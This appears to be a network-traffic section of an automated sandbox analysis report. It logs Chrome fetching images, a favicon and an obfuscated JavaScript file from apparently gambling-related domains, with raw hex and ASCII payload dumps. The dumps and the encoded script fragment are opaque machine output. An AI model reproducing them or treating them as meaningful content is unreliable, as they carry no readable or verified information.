                                                                                                                                                          2024-06-09 22:40:58 UTC16384INData Raw: e8 5d df 79 bd cc ca 8b 3d 68 12 92 9c a8 76 7e bf 92 65 72 b9 96 aa c7 56 19 1f 47 b8 17 e8 0c c1 77 15 ab 78 a1 95 88 7e ed 49 5f 5a e7 43 2a fb 1d cc eb d4 ae 58 de 2f 2a 6e 90 5a 95 27 fb 3d 2f 35 b5 0e 15 82 d1 08 6b 2b 62 55 ec 5e e9 1a 38 a5 43 a5 55 c2 af c7 60 98 8d 6a 62 84 9f 9b ec ca 4d f5 b7 56 7c c0 59 ed 84 b4 94 36 f8 41 e0 4b 57 3f 14 b5 3a db 8c aa 03 04 af dd 52 0a 73 d9 e6 7a c3 46 75 f5 44 dc a5 e7 b7 1c 22 0d 2b be 36 b4 0a 5a 9d 11 4b 26 6a 18 f6 f3 a5 48 61 55 c7 1c 88 fa 01 06 22 43 68 25 2c 00 b8 4a c4 2b 29 3c f2 d9 cf 8f 8f 15 04 28 2b ab 60 62 34 b1 28 aa f9 1c 7e d0 9c df c8 86 82 b4 8f 1c 64 d3 7c 29 b3 55 42 16 58 f6 51 1c 87 89 89 e2 25 6d c2 3d dc 82 11 6f b4 44 87 47 b0 a4 3a 92 21 98 5b 68 fc 56 24 c3 8a 78 20 c6 3c 25
                                                                                                                                                          Data Ascii: ]y=hv~erVGwx~I_ZC*X/*nZ'=/5k+bU^8CU`jbMV|Y6AKW?:RszFuD"+6ZK&jHaU"Ch%,J+)<(+`b4(~d|)UBXQ%m=oDG:![hV$x <%
                                                                                                                                                          2024-06-09 22:40:58 UTC1488INData Raw: d0 40 a1 6c 03 b6 3a bd 60 32 1b f4 58 f8 11 56 f8 41 42 07 2c 92 20 45 5d 66 05 74 19 f1 c7 a2 ad 79 09 69 17 74 9e 93 c6 6c 15 0d 19 9b 99 35 23 00 d3 d9 85 c4 c3 01 f3 94 c2 f4 79 15 ed 11 8f 15 69 21 dd c4 69 05 c3 4a e3 3e 5f 1d cd 17 eb 23 6c 23 e6 9c 4f 68 0a 76 2a 9c 92 54 18 a8 ec 91 be 82 84 bc 0a 6a 9e 38 65 fb 9d 1a b7 f8 79 97 02 4c 12 f3 f0 c2 c9 2d 1b 93 f5 41 fb 54 86 96 d9 44 bc 9a d8 b9 87 7f fc ba 33 61 4e dd 24 ad 5d 80 17 0b a7 fc 18 81 ac 23 c3 0e f2 7c 42 46 69 1d c1 bc 45 4f 3c 0f f4 c4 5b 8d a0 b4 22 2e 60 3b ab a9 7c 12 75 5c 30 f5 21 c6 e6 10 7a 70 dc 3c b4 61 c5 c6 d9 b0 68 80 55 c4 e0 8e 47 09 07 06 28 36 04 2b 5e 2e f3 09 7f a1 e3 c7 e4 ae f8 2d 15 1a 9f 26 81 66 43 03 a6 0e 46 76 53 2d 27 55 67 08 3f 79 1e af 4a f3 6e 0a 71
                                                                                                                                                          Data Ascii: @l:`2XVAB, E]ftyitl5#yi!iJ>_#l#Ohv*Tj8eyL-ATD3aN$]#|BFiEO<[".`;|u\0!zp<ahUG(6+^.-&fCFvS-'Ug?yJnq


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          185192.168.2.54992990.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:40:57 UTC539OUTGET /pc/240516-03/static/js/t4091.js HTTP/1.1
                                                                                                                                                          Host: zb-hw.czwygs.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                                          Referer: https://hg679.cc/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:40:57 UTC645INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:40:57 GMT
                                                                                                                                                          Content-Type: application/javascript
                                                                                                                                                          Content-Length: 56340
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Thu, 16 May 2024 09:02:22 GMT
                                                                                                                                                          ETag: "6645cb9e-dc14"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE5-CACHE1[10],EU-GER-frankfurt-EDGE5-CACHE5[0,TCP_HIT,9],EU-GER-frankfurt-GLOBAL1-CACHE4[430],EU-GER-frankfurt-GLOBAL1-CACHE5[411,TCP_MISS,429],1.1 google
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: e44f76813e7f379667af93c7e71caf4f
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 1356626
                                                                                                                                                          X-CCDN-Expires: 1235374
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:40:57 UTC15739INData Raw: 61 34 76 6a 65 75 75 65 28 22 4f 34 55 77 52 67 44 67 68 67 78 67 31 67 4b 51 4d 34 48 73 42 32 45 41 55 42 74 41 6a 41 4a 67 46 59 42 6d 41 58 51 42 6f 42 76 41 49 67 47 6f 41 4f 57 34 36 67 4c 67 44 4d 42 58 4e 47 41 46 77 45 74 30 6d 48 75 52 44 6b 30 41 53 6b 6f 41 33 4b 41 43 63 41 42 48 77 44 63 66 41 4c 79 64 75 2f 51 5a 4f 6f 63 6b 49 65 55 68 36 79 2b 76 61 6b 70 6b 4c 68 49 56 5a 54 52 51 41 74 69 42 62 55 41 58 67 41 73 41 2b 67 47 45 41 63 74 58 49 6e 4a 43 51 6f 41 48 4d 51 4a 42 5a 4b 4b 44 59 65 45 46 6c 32 4c 6c 34 42 4e 43 45 52 53 56 6b 51 48 67 35 5a 4e 47 70 35 4f 68 35 61 61 6b 42 52 2f 55 42 76 44 4d 41 4b 64 54 6f 51 62 41 41 47 55 6d 4c 41 61 54 6c 41 4f 42 56 71 41 46 39 79 4b 41 41 62 43 48 63 6f 54 77 41 54 4b 43 52 33 52 4d 30
                                                                                                                                                          Data Ascii: a4vjeuue("O4UwRgDghgxg1gKQM4HsB2EAUBtAjAJgFYBmAXQBoBvAIgGoAOW46gLgDMBXNGAFwEt0mHuRDk0ASkoA3KACcABHwDcfALydu/QZOockIeUh6y+vakpkLhIVZTRQAtiBbUAXgAsA+gGEActXInJCQoAHMQJBZKKDYeEFl2Ll4BNCERSVkQHg5ZNGp5Oh5aakBR/UBvDMAKdToQbAAGUmLAaTlAOBVqAF9yKAAbCHcoTwATKCR3RM0
                                                                                                                                                          2024-06-09 22:40:57 UTC16384INData Raw: 4a 78 6a 34 2f 70 48 49 6f 6b 77 42 71 6a 57 6c 6d 35 31 37 49 77 74 75 4b 70 6e 70 43 6a 56 5a 68 66 50 6e 2f 4c 45 70 52 2f 53 58 54 5a 62 49 58 31 65 43 41 69 63 67 65 55 57 2f 39 58 58 7a 30 5a 34 73 6a 7a 36 45 36 30 52 35 65 6d 6e 62 69 70 71 77 70 53 33 7a 6c 66 47 76 4f 32 77 62 32 4c 49 55 71 38 4c 75 7a 6d 69 6a 42 34 78 4a 32 6d 52 76 71 4c 65 43 2f 6c 5a 6f 70 31 6b 39 72 71 74 58 58 70 53 54 31 2f 4c 50 68 6d 64 39 67 33 31 72 2b 77 6e 55 6e 31 65 6b 33 6c 45 73 4a 66 74 2b 33 79 48 65 67 4e 78 58 38 57 53 41 35 47 2b 53 37 75 4a 6a 45 30 75 54 72 65 30 6d 46 76 44 5a 6f 55 35 72 35 73 73 65 38 75 4c 7a 76 62 58 68 68 45 66 50 47 58 6b 65 39 31 4a 68 72 56 55 72 4f 63 57 34 7a 6d 35 6f 73 72 4d 33 54 41 6f 6d 6a 67 53 74 47 33 67 31 54 44 34
                                                                                                                                                          Data Ascii: Jxj4/pHIokwBqjWlm517IwtuKpnpCjVZhfPn/LEpR/SXTZbIX1eCAicgeUW/9XXz0Z4sjz6E60R5emnbipqwpS3zlfGvO2wb2LIUq8LuzmijB4xJ2mRvqLeC/lZop1k9rqtXXpST1/LPhmd9g31r+wnUn1ek3lEsJft+3yHegNxX8WSA5G+S7uJjE0uTre0mFvDZoU5r5sse8uLzvbXhhEfPGXke91JhrVUrOcW4zm5osrM3TAomjgStG3g1TD4
                                                                                                                                                          2024-06-09 22:40:57 UTC16384INData Raw: 65 58 71 68 4f 4c 32 6d 79 44 63 42 32 4f 64 35 4b 55 54 59 56 6a 73 6d 30 35 33 68 65 4b 6a 54 62 76 35 61 33 65 31 52 6a 6a 4a 70 68 6a 36 76 2b 35 65 36 34 55 75 75 63 62 52 57 35 39 6f 75 76 4f 4b 62 6b 2b 63 39 4e 4c 35 79 6d 34 59 6c 33 73 53 32 33 46 75 38 46 7a 4b 50 2b 53 61 75 72 46 35 48 4b 48 61 58 49 76 4f 4b 68 58 70 65 64 43 58 67 6c 37 76 36 69 58 6a 4f 63 52 6b 6e 6e 7a 46 53 79 63 49 58 64 46 70 65 66 67 58 54 35 38 57 58 30 6d 2f 46 77 68 57 69 58 7a 76 6e 35 76 77 58 44 47 6e 52 37 79 58 59 36 68 4d 4e 61 6c 62 49 55 68 64 41 4f 57 54 72 50 71 31 74 67 53 51 5a 5a 5a 47 74 55 67 59 59 70 5a 76 49 33 32 66 56 6d 6c 6e 6c 35 63 7a 6e 35 6b 6e 53 66 79 44 38 4f 35 43 74 51 7a 78 57 4b 41 44 32 77 52 46 4d 6a 4e 4b 54 38 4b 2f 4f 6d 55 58
                                                                                                                                                          Data Ascii: eXqhOL2myDcB2Od5KUTYVjsm053heKjTbv5a3e1RjjJphj6v+5e64UuucbRW59ouvOKbk+c9NL5ym4Yl3sS23Fu8FzKP+SaurF5HKHaXIvOKhXpedCXgl7v6iXjOcRknnzFSycIXdFpefgXT58WX0m/FwhWiXzvn5vwXDGnR7yXY6hMNalbIUhdAOWTrPq1tgSQZZZGtUgYYpZvI32fVmlnl5czn5knSfyD8O5CtQzxWKAD2wRFMjNKT8K/OmUX
                                                                                                                                                          2024-06-09 22:40:57 UTC7833INData Raw: 70 33 41 51 41 41 32 38 57 38 4b 47 5a 62 61 4c 41 41 44 74 2b 59 30 76 6b 41 67 41 44 52 6c 44 4f 55 6a 53 37 79 43 41 41 51 56 73 48 77 43 6a 4c 2f 30 4d 63 42 2f 42 52 6c 41 78 70 63 51 71 43 46 59 41 41 33 76 55 41 41 2b 2f 46 6e 79 6a 47 56 4e 55 6c 6b 68 51 43 76 71 6e 75 73 62 73 44 7a 69 56 55 6a 4d 34 62 44 6c 52 41 4d 32 6a 38 41 4d 35 68 52 41 51 55 44 31 63 6c 67 44 63 45 58 63 55 68 51 4a 6c 67 66 69 45 72 6e 53 55 64 64 67 73 41 54 4f 54 53 59 4b 4e 35 36 41 46 67 42 53 53 66 63 6a 49 6b 76 6c 6b 6e 55 65 42 44 6b 41 55 59 44 6f 49 61 59 51 57 38 6e 67 43 78 77 44 62 69 44 69 6a 50 67 74 53 6e 4d 56 6d 4b 7a 2b 6e 2b 61 47 75 43 52 6f 63 30 55 32 4b 6c 77 42 32 4b 36 32 41 69 69 73 41 43 68 41 4a 34 52 39 55 79 67 42 4f 53 33 61 6b 41 63 74
                                                                                                                                                          Data Ascii: p3AQAA28W8KGZbaLAADt+Y0vkAgADRlDOUjS7yCAAQVsHwCjL/0McB/BRlAxpcQqCFYAA3vUAA+/FnyjGVNUlkhQCvqnusbsDziVUjM4bDlRAM2j8AM5hRAQUD1clgDcEXcUhQJlgfiErnSUddgsATOTSYKN56AFgBSSfcjIkvlknUeBDkAUYDoIaYQW8ngCxwDbiDijPgtSnMVmKz+n+aGuCRoc0U2KlwB2K62AiisAChAJ4R9UygBOS3akAct


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          186192.168.2.54993090.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:40:57 UTC370OUTGET /pc/image-pc/video/sunbet_h.jpg HTTP/1.1
                                                                                                                                                          Host: zb-hw.czwygs.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:40:57 UTC633INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:40:57 GMT
                                                                                                                                                          Content-Type: image/jpeg
                                                                                                                                                          Content-Length: 20027
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Thu, 22 Mar 2018 06:19:57 GMT
                                                                                                                                                          ETag: "5ab34b0d-4e3b"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE5-CACHE3[2],EU-GER-frankfurt-EDGE5-CACHE2[0,TCP_HIT,0],EU-GER-frankfurt-GLOBAL1-CACHE14[335],EU-GER-frankfurt-GLOBAL1-CACHE8[330,TCP_MISS,333],1.1 google
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: a0d25c12a937287f3321da3f4d8736fd
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 2814486
                                                                                                                                                          X-CCDN-Expires: 2464135
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:40:57 UTC15751INData Raw: ff d8 ff e1 00 18 45 78 69 66 00 00 49 49 2a 00 08 00 00 00 00 00 00 00 00 00 00 00 ff ec 00 11 44 75 63 6b 79 00 01 00 04 00 00 00 50 00 00 ff e1 03 8d 68 74 74 70 3a 2f 2f 6e 73 2e 61 64 6f 62 65 2e 63 6f 6d 2f 78 61 70 2f 31 2e 30 2f 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 35 2e 36 2d 63 31 33 38 20 37 39 2e 31 35 39 38 32 34 2c 20 32 30 31 36 2f 30 39 2f 31 34 2d 30 31 3a 30 39 3a 30 31 20 20 20 20 20 20 20 20 22 3e 20 3c 72 64 66 3a 52 44 46 20 78 6d
                                                                                                                                                          Data Ascii: ExifII*DuckyPhttp://ns.adobe.com/xap/1.0/<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01 "> <rdf:RDF xm
                                                                                                                                                          2024-06-09 22:40:57 UTC4276INData Raw: 9a d3 06 04 90 0e 23 3a a7 2a 40 9e 74 40 e0 bc 12 6c ec 17 7c 8f 27 6f 22 f1 ac 4c 89 1c d3 ed 3e 39 67 7d c5 23 67 e8 02 fd 06 bd 7a d0 81 eb 40 b9 74 2e 13 89 a8 d7 4b 44 28 9e 74 7d c4 4b 07 28 c3 7d 95 f6 36 ea ca 38 d8 2d 9e 46 38 5d 2d f7 06 96 38 a4 b4 b9 0b e3 ae e8 24 0a 01 ee 8c b4 fa 4e 9b 4b b6 df a0 c1 3f cb df c4 7d 35 1e ee de ed af bc 83 1c eb 2c 1d e7 26 b5 cf d8 70 dc e6 2e ef 2d 3e 65 1f fe 1d c8 5a da 49 23 5e 47 18 7d e4 c6 8a 77 00 11 b7 32 fd 20 ab 03 4d a7 42 b7 56 c8 62 cd d2 a7 1c 7e 1c bf 6f 1c 6b 9a c7 9d 1e 5a 9d 47 87 3f 67 d0 6a 0f 92 fb 73 ca 78 56 54 db c7 c4 72 36 d6 bc a7 f4 70 b7 f7 56 d3 23 5a ba d1 4c 31 23 20 dd e3 0d 58 c0 20 28 24 93 50 34 1e 6d a6 3a ad 3a b1 f0 22 17 9b 1f 6f 33 4e 0b 77 00 8b ca 40 f1 04 6a e4
                                                                                                                                                          Data Ascii: #:*@t@l|'o"L>9g}#gz@t.KD(t}K(}68-F8]-8$NK?}5,&p.->eZI#^G}w2 MBVb~okZG?gjsxVTr6pV#ZL1# X ($P4m::"o3Nw@j


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          187192.168.2.54993190.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:40:57 UTC368OUTGET /pc/image-pc/video/bbin_h.jpg HTTP/1.1
                                                                                                                                                          Host: zb-hw.czwygs.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:40:57 UTC632INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:40:57 GMT
                                                                                                                                                          Content-Type: image/jpeg
                                                                                                                                                          Content-Length: 13380
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Thu, 22 Mar 2018 06:19:57 GMT
                                                                                                                                                          ETag: "5ab34b0d-3444"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE5-CACHE2[2],EU-GER-frankfurt-EDGE5-CACHE6[0,TCP_HIT,0],EU-GER-frankfurt-GLOBAL1-CACHE1[330],EU-GER-frankfurt-GLOBAL1-CACHE6[323,TCP_MISS,328],1.1 google
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: 036bee2896fbf7f432c9032be00cc7f0
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 2814486
                                                                                                                                                          X-CCDN-Expires: 2464134
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:40:57 UTC13380INData Raw: ff d8 ff e1 00 18 45 78 69 66 00 00 49 49 2a 00 08 00 00 00 00 00 00 00 00 00 00 00 ff ec 00 11 44 75 63 6b 79 00 01 00 04 00 00 00 50 00 00 ff e1 03 8d 68 74 74 70 3a 2f 2f 6e 73 2e 61 64 6f 62 65 2e 63 6f 6d 2f 78 61 70 2f 31 2e 30 2f 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 35 2e 36 2d 63 31 33 38 20 37 39 2e 31 35 39 38 32 34 2c 20 32 30 31 36 2f 30 39 2f 31 34 2d 30 31 3a 30 39 3a 30 31 20 20 20 20 20 20 20 20 22 3e 20 3c 72 64 66 3a 52 44 46 20 78 6d
                                                                                                                                                          Data Ascii: ExifII*DuckyPhttp://ns.adobe.com/xap/1.0/<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01 "> <rdf:RDF xm


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          188192.168.2.54993290.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:40:57 UTC366OUTGET /pc/image-pc/video/gc_h.jpg HTTP/1.1
                                                                                                                                                          Host: zb-hw.czwygs.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:40:57 UTC633INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:40:57 GMT
                                                                                                                                                          Content-Type: image/jpeg
                                                                                                                                                          Content-Length: 25956
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Thu, 22 Mar 2018 06:19:57 GMT
                                                                                                                                                          ETag: "5ab34b0d-6564"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE5-CACHE5[1],EU-GER-frankfurt-EDGE5-CACHE2[0,TCP_HIT,0],EU-GER-frankfurt-GLOBAL1-CACHE2[343],EU-GER-frankfurt-GLOBAL1-CACHE14[328,TCP_MISS,342],1.1 google
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: ed5e578505821f77f983bee423a3a12a
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 2814486
                                                                                                                                                          X-CCDN-Expires: 2464135
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:40:57 UTC15751INData Raw: ff d8 ff e1 00 18 45 78 69 66 00 00 49 49 2a 00 08 00 00 00 00 00 00 00 00 00 00 00 ff ec 00 11 44 75 63 6b 79 00 01 00 04 00 00 00 64 00 00 ff e1 03 8d 68 74 74 70 3a 2f 2f 6e 73 2e 61 64 6f 62 65 2e 63 6f 6d 2f 78 61 70 2f 31 2e 30 2f 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 35 2e 36 2d 63 31 33 38 20 37 39 2e 31 35 39 38 32 34 2c 20 32 30 31 36 2f 30 39 2f 31 34 2d 30 31 3a 30 39 3a 30 31 20 20 20 20 20 20 20 20 22 3e 20 3c 72 64 66 3a 52 44 46 20 78 6d
                                                                                                                                                          Data Ascii: ExifII*Duckydhttp://ns.adobe.com/xap/1.0/<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01 "> <rdf:RDF xm
                                                                                                                                                          2024-06-09 22:40:57 UTC10205INData Raw: 20 6a 58 b1 d4 de 84 3f a4 2d 4e 32 c2 23 45 67 e5 69 55 90 39 81 eb 5f 43 4d 5d 3c f6 17 24 fc d5 59 d8 b6 b2 81 b6 ab 86 e3 d8 18 b6 dd 96 fd ad ae d3 6d 93 dc 52 00 14 a5 0d 78 70 e7 a3 b1 26 df 1d 9c d4 76 6c 3b 3e 78 c5 ad 4c f6 bc f6 f7 6e 60 30 cb 9c 93 40 b2 a2 28 3e cf 5d 2a 4c 58 9d ae 68 35 ce 96 35 b6 94 a5 59 a6 4f 73 2b 66 3a d4 a7 5d 49 0b 29 2a 21 20 f0 24 0f 43 af 79 11 28 1b b4 14 a4 cc c9 98 ed 4e b4 dd 1b 07 c8 2e af a5 6e a1 c4 97 d4 54 b7 14 0a 97 c4 fe 2a 9a 73 d3 de 7c 48 a6 c4 69 4f 26 24 8c 6e e7 53 e3 5b 26 e0 37 4b 74 e8 b6 e5 05 39 f3 b2 18 88 1d 0d d3 b6 a9 4e a1 a4 a8 fa 10 3a f4 85 c9 57 53 27 b0 53 73 62 48 b3 28 1a a9 61 f4 6b 4e 10 e4 39 16 43 12 5a 34 71 85 a5 d4 1f f3 24 83 c6 be 87 43 b8 04 10 7a 1a a2 c7 2b 43 2a ca
                                                                                                                                                          Data Ascii: jX?-N2#EgiU9_CM]<$YmRxp&vl;>xLn`0@(>]*LXh55YOs+f:]I)*! $Cy(N.nT*s|HiO&$nS[&7Kt9N:WS'SsbH(akN9CZ4q$Cz+C*


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          189192.168.2.549917202.61.87.2244434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:40:57 UTC591OUTGET /favicon.ico HTTP/1.1
                                                                                                                                                          Host: js326.cc
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                          Referer: https://js326.cc/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          Cookie: com_env=p
                                                                                                                                                          2024-06-09 22:40:58 UTC360INHTTP/1.1 200 OK
                                                                                                                                                          Server: nginx
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:40:57 GMT
                                                                                                                                                          Content-Type: image/x-icon
                                                                                                                                                          Content-Length: 140
                                                                                                                                                          Connection: close
                                                                                                                                                          Last-Modified: Wed, 27 Jun 2018 09:11:10 GMT
                                                                                                                                                          ETag: "5b3354ae-8c"
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          X-Via: 1.1 aws:jp (Cdn Cache Server V2.0), 1.1 ocsapi:00 (Cdn Cache Server V2.0)
                                                                                                                                                          X-Cache: EXPIRED
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          2024-06-09 22:40:58 UTC140INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 20 00 00 00 20 08 06 00 00 00 73 7a 7a f4 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 71 c9 65 3c 00 00 00 2e 49 44 41 54 78 da ec ce 31 01 00 00 08 03 a0 69 ff ce 33 86 0f 24 60 da e6 d3 e6 99 80 80 80 80 80 80 80 80 80 80 80 80 80 80 c0 09 30 00 40 b4 03 3d e3 0a 67 49 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                                                                                                          Data Ascii: PNGIHDR szztEXtSoftwareAdobe ImageReadyqe<.IDATx1i3$`0@=gIIENDB`


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          190192.168.2.54993390.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:40:57 UTC368OUTGET /pc/image-pc/video/lebo_h.jpg HTTP/1.1
